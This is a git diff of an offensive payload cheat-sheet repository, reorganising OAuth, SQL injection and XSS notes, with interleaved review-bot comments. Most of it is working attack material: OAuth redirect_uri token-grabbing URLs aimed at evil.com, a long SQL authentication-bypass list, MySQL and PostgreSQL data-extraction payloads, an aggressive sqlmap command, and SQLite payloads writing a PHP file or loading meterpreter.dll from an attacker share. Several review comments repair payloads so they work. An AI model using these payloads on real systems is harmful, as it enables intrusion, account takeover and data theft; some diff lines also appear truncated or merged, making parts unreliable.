diff --git a/OAuth/README.md b/OAuth/README.md
new file mode 100644
index 0000000..e3efb9c
--- /dev/null
+++ b/OAuth/README.md
@@ -0,0 +1,33 @@
+# OAuth 2 - Common vulnerabilities
+
+## Grabbing OAuth Token via redirect_uri
+```
+https://www.example.com/signin/authorize?[...]&redirect_uri=https://demo.example.com/loginsuccessful
+https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost
+https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.com
+https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com
+```
+Sometimes you need to change the scope to an invalid one to bypass a filter on redirect_uri:
+```
+https://www.example.com/admin/oauth/authorize?[...]&scope=a&redirect_uri=https://evil.com
+```
+
+## Executing XSS via redirect_uri
+```
+https://example.com/oauth/v1/authorize?[...]&redirect_uri=data%3Atext%2Fhtml%2Ca&state=
+```
+
+## OAuth private key disclosure
+Some Android/iOS app can be decompiled and the OAuth Private key can be accessed.
+
+## Authorization Code Rule Violation
+```
+The client MUST NOT use the authorization code more than once.
+If an authorization code is used more than once, the authorization server MUST deny the request
+and SHOULD revoke (when possible) all tokens previously issued based on that authorization code.
+```
+
+## Thanks to
+* http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html
+* http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html
+* http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html
diff --git a/README.md b/README.md
index 65f3a01..abc1777 100644
--- a/README.md
+++ b/README.md
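Review bot: The redirect_uri section lists four bypasses but never states the server-side check that defeats all of them, which is what a reader of this file most needs: the authorization server must compare redirect_uri against the pre-registered value with an exact string match (no prefix, subdomain or open-redirect hopping), per RFC 6749 §3.1.2.2; suggest adding `Defence: register full redirect URIs and compare with an exact string match; never accept a prefix, a subdomain or a redirect parameter as a match.` under the first fenced block. The "OAuth private key disclosure" heading is also misnamed for OAuth 2: what a decompiled mobile app leaks is the client_secret (OAuth 1.0a had a consumer secret), and a public client cannot protect any secret, so the entry should name the credential it means and point to PKCE as the mitigation rather than hiding the secret better. The XSS example leaves `state=` empty, which deserves a one-line remark that a missing or unvalidated state also leaves the flow open to CSRF.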
@@ -8,6 +8,10 @@ Last modifications :
 * Methodology added
 * AWS Bucket added
+
+Extract nice bypass from https://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
+
+
 # Tools
 * [Web Developper](https://addons.mozilla.org/en-Gb/firefox/addon/web-developer/)
diff --git a/SQL injection/Authentication Bypass.txt b/SQL injection/Authentication Bypass.txt
deleted file mode 100755
index 527b2b2..0000000
--- a/SQL injection/Authentication Bypass.txt
+++ /dev/null
@@ -1,77 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
\ No newline at end of file
diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md
new file mode 100644
index 0000000..6515ee5
--- /dev/null
+++ b/SQL injection/MySQL Injection.md
@@ -0,0 +1,60 @@
+# MYSQL Injection
+
+##MySQL Union Based
+```
+UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
+UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
+UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
+UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
+```
+
+##MySQL Error Based - Basic
+```
+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
+'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
+```
+
+##MYSQL Error Based - UpdateXML function
+```
+AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
+AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
+AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
+AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)--
+AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
+```
+
+##MYSQL Error Based - Extractvalue function
+```
+AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
+AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
+AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
+AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
+AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
+```
+
+##MYSQL Blind with MAKE_SET
+```
+AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
+AND MAKE_SET(YOLO=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
+(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
+```
\ No newline at end of file
diff --git a/SQL injection/PostgreSQL Injection.md b/SQL injection/PostgreSQL Injection.md
new file mode 100644
index 0000000..ad4d208
--- /dev/null
+++ b/SQL injection/PostgreSQL Injection.md
@@ -0,0 +1,9 @@
+# POSTGRESQL
+
+##PostgreSQL Error Based - Basic
+```
+,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
+,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
+,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
+,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
+```
\ No newline at end of file
diff --git a/SQL injection/README.md b/SQL injection/README.md
index 9b29418..9cf86f8 100644
--- a/SQL injection/README.md
+++ b/SQL injection/README.md
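Review bot: The first payload of the UpdateXML block ends with a single `-` (`...,null)-`) while every other line in the file ends with `--`; a lone `-` does not open a comment in MySQL, so the rest of the original query stays in place and the payload fails for the wrong reason — change it to `AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)--`. Since these lines are meant to be pasted into URLs (the `+` in the UNION block are URL-encoded spaces), it is also worth stating once that MySQL's `--` comment needs a following whitespace, so `-- -` or `%23` is the safer terminator when the trailing space is lost. The MAKE_SET block looks truncated on this page (the header announces 60 added lines, far fewer are visible, and the line beginning `AND MAKE_SET(YOLO=@)` reads like two payloads merged), so I could not review that part.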
@@ -1,8 +1,12 @@
 # SQL injection
 A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
-## Authentication bypass and Entry point detection
+## SQL injection using SQLmap
+```
+sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
+```
+## Entry point detection
 Detection of an SQL injection entry point
 ```
 '
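Review bot: The sqlmap one-liner under "SQL injection using SQLmap" turns on `--risk=3` with no warning: risk 3 adds OR-based boolean payloads, which sqlmap's own documentation flags as able to modify or delete rows when the injection point sits in an UPDATE or DELETE statement, so this is not a safe default against a live target. Suggest a one-line caveat under the block such as `--risk=3 enables OR-based payloads that can alter data in UPDATE/DELETE contexts; start with the default --risk=1 on production systems.` The `--url=""` placeholder and `-p username` would also read better with a concrete example URL so it is clear that `-p` must name the injectable parameter.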
@@ -22,103 +26,88 @@ Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (')
 ```
-
-Authentication bypass - use the file "Authentication Bypass.txt"
+## Authentication bypass
 ```
-SELECT id FROM users WHERE username='input1' AND password='input2'
-SELECT id FROM users WHERE username='' or true-- AND password='input2'
+'-'
+' '
+'&'
+'^'
+'*'
+' or ''-'
+' or '' '
+' or ''&'
+' or ''^'
+' or ''*'
+"-"
+" "
+"&"
+"^"
+"*"
+" or ""-"
+" or "" "
+" or ""&"
+" or ""^"
+" or ""*"
+or true--
+" or true--
+' or true--
+") or true--
+') or true--
+' or 'x'='x
+') or ('x')=('x
+')) or (('x'))=(('x
+" or "x"="x
+") or ("x")=("x
+")) or (("x"))=(("x
+or 1=1
+or 1=1--
+or 1=1#
+or 1=1/*
+admin' --
+admin' #
+admin'/*
+admin' or '1'='1
+admin' or '1'='1'--
+admin' or '1'='1'#
+admin' or '1'='1'/*
+admin'or 1=1 or ''='
+admin' or 1=1
+admin' or 1=1--
+admin' or 1=1#
+admin' or 1=1/*
+admin') or ('1'='1
+admin') or ('1'='1'--
+admin') or ('1'='1'#
+admin') or ('1'='1'/*
+admin') or '1'='1
+admin') or '1'='1'--
+admin') or '1'='1'#
+admin') or '1'='1'/*
+1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
+admin" --
+admin" #
+admin"/*
+admin" or "1"="1
+admin" or "1"="1"--
+admin" or "1"="1"#
+admin" or "1"="1"/*
+admin"or 1=1 or ""="
+admin" or 1=1
+admin" or 1=1--
+admin" or 1=1#
+admin" or 1=1/*
+admin") or ("1"="1
+admin") or ("1"="1"--
+admin") or ("1"="1"#
+admin") or ("1"="1"/*
+admin") or "1"="1
+admin") or "1"="1"--
+admin") or "1"="1"#
+admin") or "1"="1"/*
+1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
 ```
-
-# MYSQL
-MySQL Union Based
-```
-UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
-UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
-UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
-UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
-```
-
-
-MySQL Error Based - Basic
-```
-(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
-'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
-```
-
-MYSQL Error Based - UpdateXML function
-```
-AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
-AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
-AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
-AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)--
-AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
-```
-
-MYSQL Error Based - Extractvalue function
-```
-AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
-AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
-AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
-AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
-AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
-```
-
-MySQL Blind with MAKE_SET
-```
-AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
-AND MAKE_SET(YOLO=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
-(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
-```
-
-# POSTGRESQL
-
-PostgreSQL Error Based - Basic
-```
-,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
-,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
-,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
-,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
-```
-
-# SQLite
-Remote Command Execution using SQLite command - Attach Database
-```
-ATTACH DATABASE ‘/var/www/lol.php’ AS lol;
-CREATE TABLE lol.pwn (dataz text);
-INSERT INTO lol.pwn (dataz) VALUES (‘’);--
-```
-
-Remote Command Execution using SQLite command - Load_extension
-```
-UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
-```
-Note: By default this component is disabled
-
-
-# Other usefull payloads
-
-Polyglot injection (multicontext)
+## Polyglot injection (multicontext)
 ```
 SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
 ```
diff --git a/SQL injection/SQLite Injection.md b/SQL injection/SQLite Injection.md
new file mode 100644
index 0000000..6981711
--- /dev/null
+++ b/SQL injection/SQLite Injection.md
@@ -0,0 +1,14 @@
+# SQLite
+
+##Remote Command Execution using SQLite command - Attach Database
+```
+ATTACH DATABASE ‘/var/www/lol.php’ AS lol;
+CREATE TABLE lol.pwn (dataz text);
+INSERT INTO lol.pwn (dataz) VALUES (‘’);--
+```
+
+##Remote Command Execution using SQLite command - Load_extension
+```
+UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
+```
+Note: By default this component is disabled
\ No newline at end of file
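Review bot: The two UNION lines in the relocated bypass list (`1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055` and its double-quoted twin) carry an undocumented magic value: `81dc9bdb52d04dc20036dbd8313ed055` is MD5("1234"), which is why the payload is prefixed with `1234 ` — the injected row returns an admin user whose stored hash matches the password the attacker submits. Without that note a reader cannot adapt it to an application with a different hash function or column count; suggest adding `# hash is MD5 of "1234"; adjust the hash function and the number of columns to the target` above those two lines. The heading change itself is fine, but the two `SELECT id FROM users WHERE ...` lines that showed what the bypass does to the query are deleted and do not reappear in this hunk, so the list loses its only explanation; keeping them above the fenced block would preserve it.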
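Review bot: The ATTACH DATABASE example uses typographic quotes (`‘/var/www/lol.php’` and `(‘’)`), which SQLite does not treat as string delimiters, so the payload fails to parse if copied as written; replace them with ASCII single quotes, e.g. `ATTACH DATABASE '/var/www/lol.php' AS lol;`. The VALUES literal on the INSERT line is empty on this page, which looks like the PHP payload was stripped in rendering rather than omitted from the file — worth confirming against the raw file. The load_extension entry would also benefit from naming the prerequisite behind the closing "disabled by default" note: the host application has to enable extension loading (sqlite3_enable_load_extension or the equivalent build option) before that payload can work.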
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 7cdd819..62a9e9f 100644
--- a/XSS injection/README.md
+++ b/XSS injection/README.md
@@ -67,7 +67,7 @@ Base64 encoded
-With an additionl URL
+With an additional URL
 ```
@@ -254,6 +254,13 @@ Bypass parenthesis for string - Firefox
 alert`1`
 ```
+
+Bypass onxxxx= blacklist
+```
+
+
+```
+
 Bypass onxxx= filter with a null byte/vertical tab - IE/Safari
 ```